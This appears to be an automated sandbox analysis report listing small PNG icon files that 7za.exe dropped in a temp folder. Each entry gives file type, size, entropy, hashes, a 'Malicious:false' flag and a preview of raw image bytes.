      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1925
      Entropy (8bit):7.893697336263548
      Encrypted:false
      SSDEEP:
      MD5:AD351E5BB5AFB97CB966869C43308854
      SHA1:4A19F72B414E6B840689AA56D18B6E9AEF70F1C3
      SHA-256:44C58FF9BE984322A655CC662250A52AA16CF4FA9999BED095D1BB3079B132D9
      SHA-512:355C39EC2C886D8A8509F962A988F03A6754E3301655B548B85287C748DDF53DEE206C9E90CB1D9171EFD26A354836082ECACBBBA31FE2212B3A3E8A383EA91C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB........?IDATh..Z{lSU.?.].:...9!(.....@`k.?&.5.&...d1.L.M.D'....Y0..s...$....D..x..H.`\..l.m..[...=...-.....u.u.;.|.9..;.....q..-..@.....h......[s(...@.....4..u3.:.C`.&..2..V.....zQ..Wi.......<h..R....fc.6...I....k&].M>0w..+mL..=}.@h..tI..@.(a.EBw..=..9.B.N.?../?.1...D(.F.MW.Nd....z.M..6...HmLpRA..)#i.C......h......,....G...P.<>L..F....n....p.R.FX7!..c.....L.Q.......$..`..(..C..20...975...U..B.......C.^.ge.<a....P.`.,.v,w......j../..yr.....]..W.P...j..."|....woX-.H.Q.t..I.;.d.....}.Ir6..<kq.I9.l.5...d.6.;.......k0... ...\..R...._.C....8.a@tF|......:'.*..|2D9cQe...v........U......t...Q..#B'..C.Cm.mm..6.....P.....k>...pSK.2....s....~?....?.6.9T0...R".2TyM5.g...l..*..D......oY-./.g./7...W....D.>..&.v..3X.43*.0;' nd.<...Pf.R....|Y...-..@..(..V..K.&.,........[=./9.3..}V.......-C...7..-..3n5...H........._.Ck.......3..)y..q......r..k.......Xr .P.#.......$%-'..'k..Z..)....T`9..KU..(..t..c.....i|.6Z.F|...b.....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 62 x 62, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1015
      Entropy (8bit):7.759954851716646
      Encrypted:false
      SSDEEP:
      MD5:3249F880C5536F2F3EAF14FE0C74AD17
      SHA1:44C1868D82DF4DE930B7DB3396FD9F0DD60CDD37
      SHA-256:DBE8CF321BA260C13546FA71B161031FCDD86027C99DD9F02008C574738A3F12
      SHA-512:C1B3698401DE4B3F270B8008338095DBCC833E8506069A12389E53E68D414E2FA4490BB3E19D78F3539A1711E8FBCE1F0E31ACC85EB4CF3B71ED75778B1E3F03
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...>...>.....s..D....sRGB.........IDATh..ZML.A...[ ..j..01xPJ.`.!..H8xP/....D.9..V.c4......M.../z.BP0....JM.'A1..)mQX...4[:..X.v3{.{......7....!......................U.._/P.J.\f..5.:....IJ'....p.$.3.....a.....2N)......k$..;....{....p.......qJHh..R...}k"<BR.c.v.Af.....'...!t..&.B..8.g'.i.x(.......h..{....|(.H..5.......x....@....|.......2....W...z..fH.`*.g+.4.....OE.F....^j.U.m.Y&.....<......a~^.6.....+...}..!.(P...Y.~%YJh..E..><.l.q.}I...I.EU.sL*nguE...9&...."nRqQU.....Y].7...*v.I....T\T.;..\]MW..@.$0.n#.X%Xl...8uB3|x....c...Zg.8A.........J#.v........m...7...G<........./.cV.].......b.2..............VU......_.^...6.y~.-.u..m0~/.?...1c..B.l...2....+.H.........y..k.&i.N0.}._<nu.x_...)D.q...`..R]...LU.m.[..ph.u.....7+...-)^j.....*Qn.[L..G.C..c..........qF..iy..!..y..q.. pK....T..<V..-..A..;J~...'.Q..4.e...w%.....F.|.~6.g....r.bx.i5+..'%..... ..->)1.|X}_....z.<..-.S.P.:.:./.......,...+.X~;.lhy.ozo....Wu=:5X................d*...U.9X
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2415
      Entropy (8bit):7.851360862492198
      Encrypted:false
      SSDEEP:
      MD5:0D9A7D140FDDF5B1EBE9DBF4A6E1C6F1
      SHA1:339D6ECC650CF1BDF7278FB5AF87F7E71E50E4A9
      SHA-256:5092511909799212E1DB3DF6A56C0C24665415901D5998498CB0116B1572DC45
      SHA-512:CE7DA28809403DFB20A5DF88902E98C64BDF1427E28FBAEEBE5339925ABA6222439F9A9239C36152FC4D10F5B0DFA7B4CEBF3E7E8353763C42C2A872F6FB5883
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx..kl.E.......R j.....P..P.%RHhy.....D....L.a..P...".E...h..4....H.<.....JK..?..w.^.w..mS.$ewggg......r}. ---/uvv.I....>.o.!..uI.nP.O...}.......O]P.{..}B..(,A.{.0....}...c;.H.MMM....E.....%C{---..1.~.R.^4V.....w|..M#..t.a.F....<$n......<3>].......u..`J../..............;......:.s..C=..Q.G...s.......<.....P..eT..=..\,.&Z...w..E...9.g=.....=..1....zQ..5...0....A.b..,Q<.Y1...S.m$.+.z..y.....d..`.7a.X2.9.i8y0...n].b.s.z...#.....C....I"w.@i...}......^.x..R..r.......+...N........i.....bY`..?h...pY.H...Ec{...o....qj/...V...Z.s......'..qV...WGO.?=..S&.xX....).....wK.C5];5O.;..~|....o...#....@dP.vK\..x...U.q.3.......W......5:..b. ....../.P..[<z..B....5...R....z7!.2.A.^.[.-...Pe+...X<...z~7...PV.y.<= #D.M[...Ga9g...B.x..../.(j'.@.2+_..;xH.i..V...+....Ai(..|...".....l...-7.=..<.Na...L.c1...16+....zK.x.b..B..X...9=.)...zi..\.....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1559
      Entropy (8bit):7.725604600841838
      Encrypted:false
      SSDEEP:
      MD5:567F5B6EB3894944E55985B8BB3536C1
      SHA1:2227F5BB4DA9EE2CFCAF1553B185EFC7FE6AD03A
      SHA-256:9EB584D152E58DE65FAA5A4232238E896C0C051C444C9AD7CEAAF7F97A88FDC0
      SHA-512:417913D306BE8E11BF9CF9BA6DF07A9DC054045D9484863425A56B5DB61DC9B5DE9DE7DAE3D0E970ADFDF3CE05CAB54DFD5E81762EC80FA053C102F27268006D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx.._l.E...w.-.(%*.V..z6.C.5...>..511..(....L.>.. .J.0.X...>h....1i...*J.Z...][K...m.cvn.n.2w...$...wfg?.....d7.R...}pqq....Y..P.F.,.$r...>....~uu.."...@a.....}.m......)..NUU...^...`".h...h...9....:.s.h.X...p...ec....3...9o..c....QE.*rk......O^[.{m.y..R.(......c.\6........5j.|.Ps.2@mTj!.Ts.2@mTj!.Ts.2@mTj!.Ts.2@mTj!.Ts.2@mTj!.Ts.2@mTj!.Ts.2@mTj!.Ts.....~~..|..$....P_.....M5.............[.N4....].#0xz...Z...>....j.....l......:......j..v.2..82....p... ......D.......]...(....?...H...S..=J7|.........\...R..}..W.%....!8q.......].F..m......S.>..L.Q!:......l7.............k...,#f.i.g.:...j.F..9n..\.i.].....b..b. vo...x^.b9..i..?..>..%g........5wh...o^].....]........<...U_....l.*...R...3...}..4.T.#.<.C)..PX...#...=.......*..[.T....9uS1.8~.F{..MV...............;...t..d1.S.o.%R.{e...w5....%}7#.m.:..w.d...?.e.l........>.L.O.F>....J
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1646
      Entropy (8bit):7.775796501908596
      Encrypted:false
      SSDEEP:
      MD5:ECE4FCD4AF830DE217DB1AAE2E5BD36D
      SHA1:9F1EB2E366BC26B6A89A5594F5A194B8E740D720
      SHA-256:B166A6FCB6F8E8CF682C4A44FBB984B67F360BD73A018B746FC947BAA7E78B68
      SHA-512:438DAE3CA7D11DDEAE5996959C41ADF34E8D75814FB0A4ECF1E79513EAC535060913E3805B8E34D40A113AC701EB79910224B4DEC13FD4F8F317D464BE669403
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx.._l.E...r.;..P#T..`[I.O.(m...%)...Z..'#.'.5&..b.}.D.4F.1.XK...;l.$.Z(..Rb.&-^{....}{.w7.;w3.[{.$..|.........=.K.sss/%..c.y..vx<..4..J..I....../..`...GO...~~.$\..Y...k..8@.$.....2.h.c..N.....uJX...C;.........m'xV...]..s<....4...`r.I.#....x.........O.q......%..W..X..%...Z...lBD.t..h..s...@aT|E...",%.......EXJ..Q... ........+.@>.a)..F.Wt....2.L..h...K..T..nF.<.\.....d.:..g.W.n.........C.!....{.b_..P.W....i..wq..02=c......O......`.z....P.".$...$....@I....'.N...?...m..e!.%..&....nMC.&]..ON.|.....*7.r.4>....wW.l..y....Kb...luy..I......3...........Cr.s/]_..c...........V7........Vf..v.6+.S...0.,D.QX..r.._.v.?.M..>.1.......w]....R..u...Fo.u.]..[=.!].R....=.f.iq.G..r....C..r.(}....*.4.].\..2..[9...>J-..f.O...7.7..oZe3.........V.H..h...g.e2q...sk...#.V.....B.d......kFU.....c.....s.Fa.,.N/...V..u\.b.qkK..Y.~..U......4#.YY"...T......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1736
      Entropy (8bit):7.77767797270871
      Encrypted:false
      SSDEEP:
      MD5:7642590E6124B60609DA0EA345C37E75
      SHA1:CFAF73895BAE3A6FB8B10DD1F3804017CE3B6168
      SHA-256:DFF3EA72A9AA121EFAB10AAF1656DBDA3667FEC815AD5C3E5501CE8537860589
      SHA-512:FF7C2C48C14190A9394B01F63032D5688EFC3151D9EF22730C0B53AEE8BB96A3141D6132BD7309C3CC61D98A1549EEB52D93CAD35EECA9E48391E9E875EAF596
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu...>IDATx..[L\E..g...]..c/.....b...e1..X..&.z}1.}4...._.6>zA_4F.1>5.....].....R.VQ......-~.........s..K.3.s.....o.=..'...w...<I.7S.&..S..........4q..[....E..~@...../P.....t..........S8...`8..L..)."F..$".C..1..w......d.%b.^.f...3o...R..n...\"n5^.x..s.2.K.v.j]uJU..H.*..5..k.e..=...32.F...8..H.......@g....4*gE...t..(..Y..t.".j.J.rV4...H.*.x..9V.....G.|TT....Gph8..H.....y.....<G..|e..-Yb.yp,.zGF.[....6._kcy..'..~...SD.?p..N....Zx].x.....*.........o...}....Ge.Hua.|...5U.J5.|...Ex..=..&...,4t.....2..?}.QIM..@.2.aK.k.F_.u.*..-P.u..u"Y.4.........5@0_......5.....q(..K..,~\..k)..:...g.......m..jz..x.. {..n.6.T$#.._...g....I.....J.(NIU..o.j.x..a..~x...).p...<..W(...7v5.C.Q.".~......$..{..Lb.o.+..v~.,Y.n...+.........]..St.\..F;.....s.._.L....q{....9....|.[...r... .5..w.(}.....u...R.F......vQ!c...^...utD....wK.r.Z_..W.H....=]!66....G..w..P_u
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1663
      Entropy (8bit):7.7389236704268916
      Encrypted:false
      SSDEEP:
      MD5:C6725E7E0A2DDA5B27C337DC1C5AA6B1
      SHA1:6D9B30735BB9E76385C24FD49063ACD43A43C067
      SHA-256:4994C04AD58BED21B0A2DC6D652D1ADA7E99BDF11676AF6F6EA74E6865066D16
      SHA-512:0FBBD310408A38598D291524EF83B8C2D054C0477E70722B20E8AF35522E2CE3DCF666EFFA79CCAE63988090E19E5ABC2641ED89E736AB99CCA0B592DB5CA3D0
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx..[l.U...nmiK....h.hc...6......(...CK....i0.....h.......(*..J[.`l.\.%X......n....g.l..Y..a<'.=3g.s.;.9...N@%........^...r.:...&...v...I.1..............%.k..c.k...1..~AA.V.8b..D".d.K....\..D.W2.EEEG........L.,.k..G.R.....m..4.V......|=..Y.I...R..r]mJSm`I@2_.90dyT..!.....N..6......P..6*kC....P..6*kC....P..6*kC....P..6*kC....P..6*kC.....[l[.0..>..O...W"6.3o...D5.*U.t.........-.h.....Ts..KP..J..k...T.....K(....uI].F..\.i../.SG).]C..:~xz.Z\\.....7.N.g..S.'....E...v..(...:..@..%...%G@........:......:..m_.%.q.......oDr..9...q....?.y.o\/O.<u.tOO...A..X..(..'...i"x...v...h.=..W.....g'...d<JV...D........q.^.x}y.jy.."...j...yjPu..I.....6.9\MmPS...^.c....w6.5....R.&.A_..~..qe.Z..@.x....S}.....R.}iiH......@...........~..r......jG)...6..:..yY.........S.I.A)A..1r....8..;....Q^4...(.DF).)=.b.]....... .k...=...)E.%.....s.....5..<
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1741
      Entropy (8bit):7.77488411551899
      Encrypted:false
      SSDEEP:
      MD5:0B1670795F66EE2A2DBC06E50B513B0A
      SHA1:4AA76292EDE49E98596F5DC113B0EE50AF1CD6B3
      SHA-256:4DA7CCF08D94F78C5E45554F8998C0E5F6D0A07B8A3A9E4B109543DB6BC9BA43
      SHA-512:D96C37B78D05051D50F165CEEE27AD1B81307CAFDCAF73900AC22C153442209DB23EA58804FD95D14A34C5DE5E35DA63710021F5ED144486CFB5FC9469301B1E
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu...CIDATx.._l.E.....-.bT4.."g.@.V{=....V|.A0.{1.{3A.!..)._....Ic.....E.^5P#..A,H...T..?......G..f.fw........3.....o..!v.LLL.;;;..}..P(......W.p.*|.8..qEE.v.!....&''..U..q.I..$..{...;).A..0.H....H.&..|.D...............L....`.....f.m[0..F)"p..5...3...OV].z.Khu.....!.j|....0.(e.DB...2..FL.8.1.i..(.Jlh...Hk.@iTbC.P.EZk.J.....b..Z.P......s.........i/^.a.....7.gzz^An(-ek.,.O...)...B..=..Y...,N)...@.........dwSj.X0.-.._.......K..J.U....s.[[U..Y..c.[N.~I .?.<......%.\...Y.[...4..f.5/E...k...9.z.8.....g.u.....6......_...m..i.....F7....q|.u.?.zG.L1B.|.i.u.......n...e.....ktli)c..r>o.....nk..%....7'..n.A.{}........j.C.H.kQI......Y....G..m..iY.....f.........9...Yui........%.#.i...jh....kPp.....?@."...hX...]z..Ls.\.aK{s#.F .......g{~.O..k.o.wSt...yk.~&1..oW.n.B=...+...........cY.5...V..a..{..A..O.{ ..NO......;.....W.y&...U......|X.Ea..../.|....S-
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1239
      Entropy (8bit):7.5911612957870185
      Encrypted:false
      SSDEEP:
      MD5:02ED5929A4F22B25B89DD15D3F68E894
      SHA1:F13C1CC49172113BD3EBE5D4A570020C0FF90666
      SHA-256:BEE98C4B7D4BD2E447F71DDB5CBA6234EDA2FC13A8F7E9AEB2D7E46A286D5911
      SHA-512:DCE70E322382C9A7B5F06433C69C40BC52DE03DCE63E6A25A1681E06CCD1ED0BD22507F022457F3C40701A162584E832FB08FAB875A95711E9D5BF7962DC1EBE
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu...MIDATx..=L.Q......x.@..91....E.A..B...X..........3........A.0..A..FH..5....H.sfa..<.[g...n......v.....>.(SSSG...E...M%>./..RU.0..~...s/++..R.>...........-..2.1.x;33.........F.`.!....Ke%...h.B...?j...f...+.........f7.[0.."....n.~.:/.t|V....`.U..*.Z..|...."4!P....h.....8.\......^Q...K..1*....s1..@cTzE...b,.....P..X*..Q.......T....+.@=.c..4F.W..z.............U.......)PM.{...4..d.....jh..&....&...X.J.r..c.8.;.N<.X..:.+[..G/F.'...... ;..QV.p../...p..S[C.......-CV..+W|l'.{/.C....06,v......@......#8n.vlv.....r...}.@.^....H.h..(.......H.h..(.......H.h..(.......H.h..(.......H.h...ss.P..T8F.1alX8.../.....z.q...O..#.j...5ug.(\..?1n.\...2a.63.=.?f.sMD.rjwX..e...1.....!...'..........u..1....9...}......3..E..`.P../.va..t...0..gu.....s..`.&^z.}.......q..z(l...X.8.XWF&./.{.|U.W:-....j..7..4.'.<..w....n>.6..m.I..a.;..4.%#.m.....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2357
      Entropy (8bit):7.83691670976862
      Encrypted:false
      SSDEEP:
      MD5:C4A70AB928EBF97B3BCD1214BC9CC77B
      SHA1:48F08F7BC1D46E514FEB09D91993A26621242274
      SHA-256:7236BFDBEA0D636E68B6614D586A112453A1AB5083A046C027FDA47E753B838C
      SHA-512:7B161682651ADAB30412EEE4297EB0026D4EC7782308CE049C6E486738C433D4F9F8EBE9C21A0D71514D6E9855C3E3164F32D5F701B6E8255EC489403D763123
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx..[l.E...J-X.[...............<..../......_ E.....1..!..<X.-".....b.....- ...?.|..r.gwv.....3;;....o.F.In..R[[..z.n..D"}LI......|.8..m.n...."...f.u.3.~Dq...^...../.v..wqG.lnn.M..(rDR.....RG{;;;.....ht^..A.,....Dh.H4.),aZ&.#...#n.Q..N..O.qQ......:L.&.$@./.=0..n.i.@^.....N.0.5.PqXs.......:a.......mT..C..\l..m..N....b;6.h..u...5....N.S...[.....2>..@.^.sW........7.S...-.....b..)..u3..p..Z}.Vl'x......E.18G,.7F....W..q.k...Sg.....xv.(.8@...(N....>r.....$..k.7.&C.??O|<.P<IP....n8yF,.?..G./..&F..V..u....Sg...#...."..#...EU5I.n..!b.vC...8.t..1..0...<....qUl...d....]TUM..Q.6(......I=....F.;.....k...sD..3....;.2.6....S.x.......R.../..%*fM5.)...P..... ........V.....*.K..rU....g..a.!. ..^..P.XW...#3S..1T@q.............7cH.....P........xJT.*.7s[.....p+..y.O.L..._.b..ZW..1....6.m.a....U.<..E...6...0z................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1096
      Entropy (8bit):7.536772987557572
      Encrypted:false
      SSDEEP:
      MD5:96420A07015F68357EDFAE8BCA93EDCA
      SHA1:33BB85B91ACEA0EDEFAA27A963C9DC92AAB6B40D
      SHA-256:DC71214B7D50AF99558E08865AB6040C1C150F03D8D2D2FF82326D85C3D90C67
      SHA-512:CE8C057D46C1D4D21161A37A82440448087799CA92D3ED76225C07DE8BD73E2A3B24DD72BB23DA6597BEF9E795B41DC35D37F48A752F80D8727C76ABB067A1EB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx....KTQ......2C`Pi$./'.T,H.E. .uH.c.6.[H.L..Z...-[..Z.DD...EB%i....#c..y..;....8....w.9...x....-.fgg..r.s..M.Z|..,dM-.....59..Fmm..~.@...+4.@m....<.,!^...../^..f2.}...56.c.......D".".. .z.W.....f....N.|D.CLc8.M......3.3..m.h.=.U.V4..F.*..W`...6.).ff&g.....>8......2....b..@k*s .......2....b..@k*s .....#../..y...A..T<}.:o}uU....p..p.....E&..z..........O..X...1...Qgp..W..a_'wm.zR;.~..OP....G.i?.q.....I..~S.X1s.p.H...Z.....,.2..f5..w..?*m..,...U..V.w......].i...Q.@!"..(......(......(......(......(......(......(......(......(......(......(....._......."|.....i.n.M...U...n.W._....~..5@..:.C.....Z-[.....40..z ......L.O...?.\..j..AO..0.PCy.W]....!......._..o..|l.?............./.|...L8....H.v/Y.s..R-..i...\.d.N2.s.&>.p/.p.1..j.d..p.........P.......Q......Q.R@..c..+D.Mg;...m........&%-1.???.#.........bmA<..O..ex.&@..Gv....0.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1541
      Entropy (8bit):7.730779470729944
      Encrypted:false
      SSDEEP:
      MD5:CDF7CBDEF35C83FA6AF114E834909513
      SHA1:68CA79F18D330BC16087249DF3FFA36E86DF8923
      SHA-256:466EE01C9E431CB780D6AFAB835DBAE82C863BE821FB96EC25F8D421AF76539A
      SHA-512:E960FD8B9FC0CC4A5CE42EB21E773FCE26AD9426B12659BFB6945EE5FD06DAA25D2F0B56B6A4AF48C767AC196011F7FB35DCDFE87DC6CBECB87CBEA0E1777243
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu...{IDATx..]lTE.........%B..h.k)..1....D1.>...../$.....@./J..$"/...,....]..C..4.*...R..@..sn.......;3w..3I.w..;..w...Z.J....&''?..7....J.JQe........hyy..N...bxll.K<~...!.c...B<PVV....Tb....k....kS.9....t.m.H.b.4B.P;.K.J*o fTb.=o#...s..T..2.O.[c.....d|..B...E^.6.*+H...E....R.z!..FFF&.h......r.....3*."..s.,e..Q......g)..J....\<K..gTrE.(..Y..=..+...Kc..B..;Z...r>......F...K#...~2..]?A..\..I.....^..']]J...u.;.o..yPQ:.-.'.....b..1.~1.-U.}..k.......G.......3)6.s.?P.y.D.St..V.f7'> .mgj+o.3u.O.5..hW%..*..........pP.Z[c.."/..:.cW..E....`..}...=h^..6Z.e....,.....^..Z.WA.)."/."t.e]m..:x......g......?..3..1^G....-83.{.g.......y..BGV.....4];t..~.w09.0m......../[.....b...N.~k..g..u.[@.^..`.W.e..:.2.l.Q.......o......4h..y....`..P..M....*.h.3...t._5....S...?._1.s....=gcp.Gi.I;..W........9....W...@....]G.&.]Z.^..b.d.k..]..pl.*.....)......... ....dE.....>.)u.s..<..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1307
      Entropy (8bit):7.638017587984199
      Encrypted:false
      SSDEEP:
      MD5:BD9A163581FD003767A900CCF49DA71A
      SHA1:F7BBAF0ED02AA3E1DBCFF72ED4AA8C5A3E015280
      SHA-256:3E63FF06F3E685874E41D6AC8441357C9DB6F168FD635599F37CCF686D0B1344
      SHA-512:F36D0F7EF51F199A69DAC4FF65A13D0DB7B1D2A1AEA8F8FBE0F332B023E35494F51D4D6D47603D1EB148992C5305432DD9BF8540971B957098AF79B86487CD3D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx..ML.@..g.1...>....1.Q...A.....Oz. ...^.@.'...r.D..O$*z..0FMDP.h..&H.]@...P..m....M.......;...z.......D"....M...'..TU.0...............W..7??...W....i.E ......t.[4..`...?..(w.."...V........z/..X...bd.-.8...^..`r...#...J.......ya.mB.X.........X.m%.....P(...I>|.4p...@..........F.w$.|.....6*.#..s.m%..Q..7...[.|.c......g...sA......Ysw/{:2..-.M.`.....#.+6.f...C.5.....h..7.....f..u%..........x......JV..U...8=X...0Ou..X[..m.....r.S.uH..w.C.....w....R..R...O*.....T..*.N*.*..U....F..o....Z...k.+C...0...b...-.*..k....(..o.....Q}.U.n...R.8..ktB.,...Z....|......(.j.G/..f......5.T..k{...k...N...M.H......... ..pR ..$ .N.$.....I..P..`8)......'..@A...*.......A6....I.b.v......&...dEm.Dp...b.Q......`>.1....}`..egi.C.6.......L...o.d.p.;.3.PP...`9.7...5l.f..Z..6...4y...Z........;{...M..W]...+x....v...}1..:.-.....A3.a.dGU@.85.........H.P.....u
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1778
      Entropy (8bit):7.795649789988484
      Encrypted:false
      SSDEEP:
      MD5:C12AC1A5CDC2844EC7ADC39DFC102498
      SHA1:AA113997D9F06A72B55B23A465A33E2595918F71
      SHA-256:09B61892FDC67A7260C21B79F2AB92028BE8FA5547003A25E8D752AE8D53FCDA
      SHA-512:5CC233C51F54CA235918790F6E612D5916DF66583A5D91ED638B6AA664C82B66D1C89E2B6068B039977684A1EEE3D170BAE441EA0804493673DB80E6B7493BBD
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu...hIDATx..[L\E..g..@.7.(U.ZS..R...M....5...zy.o&.h..h....&.b.. ^.@-T.b..m......,.!....9;..a..=.e.....9....3...b.722r.....{7E...B.....$..dp.q...999..B<@.Y........ep..."0I.....>@...8.#.....L.Y.6.".M.....04.....O.J*/.3...$...w`J.PF..q....-<....0..}.u..Z.)..|.....X+.!P.......:r...!.-...Q..-@9.m....J.h..hK-@mTr...~......V.;xY^.9.H....y..n....z...K......w......re|..=....E...<rG.V:.....5......S?h..]...yh'.A10./m.g..X....X..?.....!-.......7._......y..........p}.....Z..).M.i.6.\...@.).b....... bs.6.Tm..`.,g.........^.tS..!..%j .T..+.K...&.Q..5.7..U|..k.....f._.:..-..6.......|..6...j>..........PD.a..X..JC..R36^...n._..l!.A.C-....[...3.m....a....V.....J.......>7Tq...e..Y...C4...8..ETKVNO..#6s.a6..v.-......-.1......7O.VG_~.....o..2....%>%O\.}.........q.o.u.y...|.G7.../..............v.y......A8...s....5l.[.x?=..D...k...|...D
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2126
      Entropy (8bit):7.816484506992812
      Encrypted:false
      SSDEEP:
      MD5:8BF5A5A026ECA60F278EB5F903B1ADEB
      SHA1:3B2D72BA22B819A807F7A74D44AE2AA5FEC93028
      SHA-256:657D9FF4B07BE112DA5E3B0C3D9BAE5ADAEF0168E8240BA58D024F0B3866059E
      SHA-512:E586DA04EA9B7460904694B912514E58B287CEC04A6DBE995C557D4E2926AF91A14300B326D363971B601CDEC8CA1FD7A5DB3851558F9C99E01DE59CEC0FD036
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu....IDATx...l.E....Z.j.0T...g!.....&..Jb4.........j...K.....`..F.....).=...* ...P@#E..H..;...{.mww.J.%{3;3;..sof...".&....ttt.@.d....D.lM..)q.H..'.8>.:t.*...P..+W..M.T...&.F.. .;d...^G...H$fP.3*,...."p..mUNNN}.-..h.....cy...&Bs.\.YGy...)t"p............4j...f...4p$@.W..,t.5.n..FZZZ:.4m.......R..5*...3....kT...@g..K.@......\\....Q974.....5.].rn./.^.v].....aK...hKw...'.e.6.~.....xI..R...b..h..;hPF@.X.U..b...i]vxSG...+...N.?t......W..%.iy#,H....e.........N|z...mMiW.,..%.......q}..3j...0.=1n,3...%......N....z.;.:.|.....l..\Tb.s..ro.M+...u...R..%...........%..D.....I5..........}..N......./T.n.1H.".!...................!..}.....#......4...$.U.j...[.U.p..v{...n.....).......1.EY....%..`:........b......9.....pb.......wK'.?.........m.4'.......'...W....Q.i.k......4D...6Xe......&q6."...t.^.|...N.P.Bm~ .c@...0K..[....93....P~'p.....6_OZ4...H..E-
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1474
      Entropy (8bit):7.71696661191768
      Encrypted:false
      SSDEEP:
      MD5:DE573442350BD134EA3B0D677E19E81C
      SHA1:9997E6BD5781FECB52BE27B52C649A9B92A8F049
      SHA-256:E27610BA9B34FF939614D6F1B6064CC16541B2B8479BDA8BE387DDE54FE57609
      SHA-512:0304FAAB54EF46AFE44DF48543D733E0D0169475149AAA111AE432E919A9E0AE4F9F2A47FC8EC7026F9274BB891DE71C653588D5400837345EF3D3728A030C35
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...P...P............sRGB........8eXIfMM.*.......i...........................P...........P.....(nu...8IDATx..]lTE...nim..(}.1-......B.....@..<h..o....1..%<.(O.._DHh...[BiL...B...bDL.R.?.,..K..'C...=...l..s.9..93s.N..`.........'.).S.P(o..:D....W..}.....m$......}}};q..e..\............3..X,V...P8....<.@+:..H.b.4..p..{.+.......y.f..=.Fu...<An.a...3.y.,.Q......`$..WH.Xh<.B.......A.M.1.....Z...Q.......T.Z.2+*@3.k...FeVT.f..R.h.....\......YQ...XK..5*...4s..N..LB....h.w....'..R..(o.,.{.fE#.......\....Q.......b)L..d3.u>ps.98t...q..h!zb}..l..<......hf&|VR.+^....I.........lZ.....K...t...njh.......Z.+^.n*/0...%......P.maK.;,.....c.A......a.........8.a......'....Qv....[(<CQ.W...........'. ...>}p....OC.P.:l...(.#..]L9z#...{.x.)Qi...W....V{..V.=!6.E.\9s..n|..-..)YY..Z$@?F.n.......7.a-. .....k...a-...~X.7o.'.{k.|P...H..........N..H......8.....u&T..../.{.T.k..h.4....w8y.v.2.3....^|!+!.2!. ..vx04...9....H.... . 